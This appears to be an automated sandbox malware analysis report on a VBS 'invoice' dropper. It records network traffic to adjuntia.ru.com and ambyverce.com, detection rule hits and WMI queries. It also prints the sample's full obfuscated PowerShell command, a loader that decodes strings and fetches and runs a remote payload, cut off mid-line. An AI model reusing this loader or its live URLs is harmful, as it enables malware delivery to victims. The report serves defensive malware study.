Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 99.3% probability |
Source: unknown |
HTTPS traffic detected: 185.221.216.115:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: |
Binary string: tem.Core.pdbo source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: Joe Sandbox View |
IP Address: 185.221.216.115 185.221.216.115 |
Source: Joe Sandbox View |
IP Address: 185.221.216.115 185.221.216.115 |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic |
HTTP traffic detected: GET /wp-includes/img/Appliances.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: adjuntia.ru.comConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /wp-includes/img/Appliances.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: adjuntia.ru.comConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: adjuntia.ru.com |
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0F9F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://adjuntia.ru.com |
Source: powershell.exe, 00000003.00000002.3438249100.00000266D77E0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.m |
Source: powershell.exe, 00000007.00000002.3329236621.0000000007A0E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.2032932781.0000021ADDAF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033119338.0000021ADDB1B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6270429c06a4 |
Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme |
Source: wscript.exe, 00000000.00000003.2033161555.0000021ADDAD1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6270429c0 |
Source: powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.3317936149.00000266BF5E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266C0C44000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://adjuntia.ru.com |
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://adjuntia.ru.com/wp-includes/img/Appliances.smi |
Source: powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ambyverce.com/Appliances.smi |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ambyverce.com/Appliances.smid |
Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0605000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
HTTPS traffic detected: 185.221.216.115:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: amsi32_5572.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: INVOICE_DF76K.vbs |
Static file information: Suspicious name |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6705 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6705 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6705 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6705 |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktiv |